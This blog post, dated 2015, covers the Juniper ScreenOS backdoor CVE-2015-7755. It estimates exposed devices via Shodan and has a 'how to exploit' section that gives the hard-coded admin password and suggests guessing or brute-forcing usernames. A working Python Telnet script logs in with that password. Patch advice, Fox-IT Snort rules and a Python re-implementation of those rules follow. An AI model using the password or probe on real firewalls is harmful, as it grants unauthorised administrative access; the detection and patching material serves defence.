Juniper Networks is a multinational corporation headquartered in Sunnyvale, California that develops and markets networking products. Its products include routers, switches, network management software, network security products and software-defined networking technology.
On 17 December 2015 Juniper disclosed (advisory JSA10713) a critical vulnerability, CVE-2015-7755, affecting ScreenOS 6.3.0r17 through 6.3.0r20. The impact is large because ScreenOS powers Juniper's NetScreen and SSG firewall and VPN appliances, which sit at the perimeter of many networks. The vulnerability allows a remote attacker to obtain administrative access by entering a hard-coded password during a (1) SSH or (2) Telnet session; in other words, it is a backdoor.
HOW MANY DEVICES ARE POTENTIALLY AFFECTED?
To estimate this we can use an Internet-wide scan search engine such as Shodan or Censys. In this article I'll use Shodan to show you how the simple query netscreen product:"NetScreen sshd" currently returns 27,659 devices. Keep in mind that this counts devices exposing a NetScreen SSH service to the Internet, not devices confirmed to run one of the vulnerable releases, so it is an upper bound on the exposure rather than a count of vulnerable hosts.
Juniper Networks is a US company, so it is not surprising to see the USA as the most affected country, but as you can see this technology is deployed worldwide, so the exposure from this vulnerability is global.
Analysing these statistics we can see that some major telecommunication companies (ISPs) are affected, which means that potentially anyone who uses their services could be at risk. Now, while this is scary, I expect ISPs to have already fixed the issue, but there will still be thousands of vulnerable devices at this time.
HOW TO EXPLOIT THE VULNERABILITY
If you have found a vulnerable system you can connect to it via SSH or Telnet, provided you know a valid username. Usernames can be guessed (the default administrator account on ScreenOS is netscreen) or found via dictionary or brute-force attacks if no countermeasures such as lockout or rate limiting are in place.
Once you have a username you simply need to enter the magic password: <<< %s(un='%s') = %u ...and you are in. Note that the quotes are plain ASCII single quotes (0x27); the string is exactly 20 bytes, 3c3c3c20257328756e3d2725732729203d202575 in hex, which is the byte pattern the Snort rules later in this article match on.
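The login sequence described above, as an added example that is not code from the original post or from Juniper: a stdlib-only Telnet probe that sends a username and the backdoor password and reports whether the device drops it at a CLI prompt. It assumes the ScreenOS Telnet service greets with "Remote Management Console", then prompts "login: " and "password: ", and that a successful login ends with a prompt of the form "<hostname>-> " (the same markers the Fox-IT Snort rules further down key on). Telnet is used here because it needs no third-party library; over SSH the check is the same with any SSH client. Only run it against devices you are authorised to test.

```python
#!/usr/bin/env python3
"""Probe a ScreenOS Telnet service for the CVE-2015-7755 backdoor password.

Added example, not code from the original post or from Juniper. Assumptions:
banner "Remote Management Console", prompts "login: " / "password: ", and a
CLI prompt "<hostname>-> " on success. Use only with authorisation.
"""
import socket
import sys

# Straight ASCII quotes (0x27): bytes 3c3c3c20257328756e3d2725732729203d202575.
BACKDOOR_PASSWORD = "<<< %s(un='%s') = %u"

# Telnet protocol constants (RFC 854).
IAC, DONT, DO, WONT, WILL, SB, SE = 255, 254, 253, 252, 251, 250, 240


def strip_telnet_negotiation(raw: bytes) -> tuple[bytes, bytes]:
    """Split a raw Telnet read into (text, reply).

    Option negotiation is removed from the text; `reply` refuses every option
    the server asks for (DO -> WONT, WILL -> DONT) so the session stays in
    plain line mode. Subnegotiation blocks (IAC SB ... IAC SE) are skipped.
    """
    text, reply = bytearray(), bytearray()
    i = 0
    while i < len(raw):
        if raw[i] != IAC:
            text.append(raw[i])
            i += 1
            continue
        if i + 1 >= len(raw):
            break                                   # truncated IAC, drop it
        cmd = raw[i + 1]
        if cmd == IAC:                              # IAC IAC is an escaped 0xff
            text.append(IAC)
            i += 2
        elif cmd in (DO, DONT, WILL, WONT):
            if i + 2 >= len(raw):
                break
            opt = raw[i + 2]
            if cmd == DO:
                reply += bytes([IAC, WONT, opt])
            elif cmd == WILL:
                reply += bytes([IAC, DONT, opt])
            i += 3
        elif cmd == SB:                             # skip to IAC SE
            end = raw.find(bytes([IAC, SE]), i + 2)
            i = len(raw) if end < 0 else end + 2
        else:                                       # two-byte command (NOP, GA, ...)
            i += 2
    return bytes(text), bytes(reply)


def logged_in(server_output: bytes) -> bool:
    """The ScreenOS CLI prompt '<hostname>-> ' is the last thing the server sends."""
    return server_output.endswith(b"-> ")


def read_until(sock: socket.socket, marker: bytes, timeout: float = 5.0) -> bytes:
    """Collect text until `marker` (case-insensitive) appears or the read times out."""
    sock.settimeout(timeout)
    buf = b""
    while marker not in buf.lower():
        try:
            chunk = sock.recv(4096)
        except socket.timeout:
            break
        if not chunk:
            break
        text, reply = strip_telnet_negotiation(chunk)
        if reply:
            sock.sendall(reply)
        buf += text
    return buf


def try_backdoor(host: str, username: str, port: int = 23) -> bool:
    """Return True if the device presents a CLI prompt after the backdoor password."""
    with socket.create_connection((host, port), timeout=5) as s:
        banner = read_until(s, b"login:")
        if b"Remote Management Console" not in banner:
            print(f"[!] {host}: banner does not look like ScreenOS: {banner!r}")
        s.sendall(username.encode() + b"\r\n")
        read_until(s, b"password:")
        s.sendall(BACKDOOR_PASSWORD.encode() + b"\r\n")
        return logged_in(read_until(s, b"-> "))


if __name__ == "__main__":
    if len(sys.argv) < 3:
        sys.exit(f"usage: {sys.argv[0]} <host> <username> [port]")
    tcp_port = int(sys.argv[3]) if len(sys.argv) > 3 else 23
    if try_backdoor(sys.argv[1], sys.argv[2], tcp_port):
        print(f"{sys.argv[1]}: VULNERABLE (backdoor password accepted)")
    else:
        print(f"{sys.argv[1]}: backdoor password rejected")
```

A device that rejects the password simply never produces the "-> " prompt, so the read times out and the probe reports it as rejected; a non-ScreenOS banner is reported but the attempt still goes ahead, since a rebranded or oddly configured unit may still be vulnerable.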
The password was deliberately shaped to look like a printf-style debug format string ("%s(un='%s') = %u" reads like a logging line), so that anyone reading the strings in the firmware image would take it for debug code rather than a credential. That level of care in hiding it was clearly intentional, so you may ask...
WHO IS BEHIND THIS BACKDOOR?
There is a great deal of speculation about this; clearly it must be someone who had access to the Juniper Networks code base. It could be Juniper Networks itself, an unknown hacker or hacking group, or a government.
HOW TO FIX THE VULNERABILITY
The best thing to do in this case is simply to update to ScreenOS 6.2.0r19 or 6.3.0r21 and later releases. You can download the firmware from http://www.juniper.net/support/downloads/screenos.html and the complete list of fixed releases is in Juniper's advisory at http://kb.juniper.net/JSA10713 . Until you can upgrade, restrict SSH and Telnet management access to trusted hosts, disable Telnet where it is not needed, and review the device's administrative login logs: a login through the backdoor is recorded as an ordinary successful administrator login, so the only clue is a login from a host or at a time you do not recognise.
Snort IDS rules, written by Fox-IT's Security Research Team (FOX-SRT), are also available:
# Signatures to detect successful abuse of the Juniper backdoor password over telnet.
# Additionally a signature for detecting world reachable ScreenOS devices over SSH.
alert tcp $HOME_NET 23 -> any any (msg:"FOX-SRT - Flowbit - Juniper ScreenOS telnet (noalert)"; flow:established,to_client; content:"Remote Management Console|0d0a|"; offset:0; depth:27; flowbits:set,fox.juniper.screenos; flowbits:noalert; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; classtype:policy-violation; sid:21001729; rev:2;)
alert tcp any any -> $HOME_NET 23 (msg:"FOX-SRT - Backdoor - Juniper ScreenOS telnet backdoor password attempt"; flow:established,to_server; flowbits:isset,fox.juniper.screenos; flowbits:set,fox.juniper.screenos.password; content:"|3c3c3c20257328756e3d2725732729203d202575|"; offset:0; fast_pattern; classtype:attempted-admin; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; sid:21001730; rev:2;)
alert tcp $HOME_NET 23 -> any any (msg:"FOX-SRT - Backdoor - Juniper ScreenOS successful logon"; flow:established,to_client; flowbits:isset,fox.juniper.screenos.password; content:"-> "; isdataat:!1,relative; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; classtype:successful-admin; sid:21001731; rev:1;)
alert tcp $HOME_NET 22 -> $EXTERNAL_NET any (msg:"FOX-SRT - Policy - Juniper ScreenOS SSH world reachable"; flow:to_client,established; content:"SSH-2.0-NetScreen"; offset:0; depth:17; reference:cve,2015-7755; reference:url,http://kb.juniper.net/JSA10713; classtype:policy-violation; priority:1; sid:21001728; rev:1;)
Note that if you have NetScreen devices running Telnet on a non-default port, you will need to change port 23 in the rules to that specific port or to any. Also note how the rules chain: the first one only tags a flow as ScreenOS when it sees the "Remote Management Console" banner, the second fires on the 20-byte password only in a tagged flow, and the third fires when a server packet in such a flow ends with the "-> " CLI prompt (isdataat:!1,relative means nothing follows it). This chain only works for Telnet, which is cleartext; the same backdoor login over SSH is encrypted, so on the wire you can only spot that a ScreenOS SSH service is reachable (the fourth rule) and must rely on the device's own admin-login logs for the rest.
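The flowbit chain described above, re-implemented in Python and run over a constructed Telnet session, as an added example that is not part of the original post or of the Fox-IT rule set. The packets in SAMPLE_PACKETS are constructed for the demonstration rather than captured; the addresses and the hostname "ns5gt" are placeholders. The example also shows why the first rule matters: the same password string sent to a non-ScreenOS Telnet server stays silent because the flow was never tagged.

```python
#!/usr/bin/env python3
"""Stateful re-implementation of the Fox-IT Snort rules for CVE-2015-7755.

Added example, not from the original post or the Fox-IT rule set. The
session below is constructed, not captured.
"""
from dataclasses import dataclass

# content:"|3c3c3c2025...2575|" from sid 21001730, i.e. "<<< %s(un='%s') = %u"
BACKDOOR_PASSWORD = bytes.fromhex("3c3c3c20257328756e3d2725732729203d202575")
TELNET_BANNER = b"Remote Management Console\r\n"   # sid 21001729: offset:0; depth:27
SSH_BANNER = b"SSH-2.0-NetScreen"                  # sid 21001728: offset:0; depth:17


@dataclass
class Packet:
    src: str
    sport: int
    dst: str
    dport: int
    payload: bytes


@dataclass
class FlowBits:
    """Per-flow state, mirroring the two flowbits the rules set."""
    screenos: bool = False      # fox.juniper.screenos
    password: bool = False      # fox.juniper.screenos.password


def inspect(packets, telnet_port: int = 23, ssh_port: int = 22):
    """Return (sid, msg, client_ip) alerts in packet order.

    The server side of a flow is whichever endpoint uses telnet_port or
    ssh_port; pass a different telnet_port for devices on a non-default port.
    """
    flows = {}
    alerts = []
    for p in packets:
        to_client = p.sport in (telnet_port, ssh_port)
        if to_client:
            server, client = (p.src, p.sport), (p.dst, p.dport)
        else:
            server, client = (p.dst, p.dport), (p.src, p.sport)
        st = flows.setdefault((client, server), FlowBits())

        # sid 21001728: ScreenOS SSH banner leaving the network
        if server[1] == ssh_port and to_client and p.payload[:len(SSH_BANNER)] == SSH_BANNER:
            alerts.append((21001728, "Juniper ScreenOS SSH world reachable", client[0]))

        if server[1] != telnet_port:
            continue
        if to_client:
            # sid 21001729: banner at offset 0 tags the flow, no alert
            if p.payload[:len(TELNET_BANNER)] == TELNET_BANNER:
                st.screenos = True
            # sid 21001731: "-> " with nothing after it (isdataat:!1,relative)
            if st.password and p.payload.endswith(b"-> "):
                alerts.append((21001731, "Juniper ScreenOS successful logon", client[0]))
        else:
            # sid 21001730: only fires once the flow is known to be ScreenOS
            if st.screenos and BACKDOOR_PASSWORD in p.payload:
                st.password = True
                alerts.append((21001730, "Juniper ScreenOS telnet backdoor password attempt", client[0]))
    return alerts


# Constructed sample traffic (placeholder addresses, not captured data).
ATTACKER, FIREWALL = "198.51.100.7", "192.0.2.1"
OTHER_CLIENT, LINUX_HOST = "198.51.100.8", "192.0.2.9"

SAMPLE_PACKETS = [
    # Backdoor login against a ScreenOS Telnet service
    Packet(FIREWALL, 23, ATTACKER, 40001, b"Remote Management Console\r\nlogin: "),
    Packet(ATTACKER, 40001, FIREWALL, 23, b"netscreen\r\n"),
    Packet(FIREWALL, 23, ATTACKER, 40001, b"password: "),
    Packet(ATTACKER, 40001, FIREWALL, 23, BACKDOOR_PASSWORD + b"\r\n"),
    Packet(FIREWALL, 23, ATTACKER, 40001, b"ns5gt-> "),
    # Same string sent to a non-ScreenOS Telnet server: the flowbit gate keeps this quiet
    Packet(LINUX_HOST, 23, OTHER_CLIENT, 40002, b"Ubuntu 14.04 LTS\r\nlogin: "),
    Packet(OTHER_CLIENT, 40002, LINUX_HOST, 23, BACKDOOR_PASSWORD + b"\r\n"),
    # ScreenOS SSH banner seen leaving the network
    Packet(FIREWALL, 22, OTHER_CLIENT, 40003, b"SSH-2.0-NetScreen\r\n"),
]

if __name__ == "__main__":
    for sid, msg, client in inspect(SAMPLE_PACKETS):
        print(f"sid {sid}: {msg} (client {client})")
```

Running the sample yields three alerts: the password attempt and the successful logon from the attacker against the firewall, and the SSH banner exposure; the attempt against the Linux host produces nothing, which is exactly the false-positive suppression the noalert flowbit rule buys you.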
If you are curious about this vulnerability, the unpacked firmware images of the affected versions are available for download.
Author: Fabio Baroni Date: 2015-12-21 15:17:37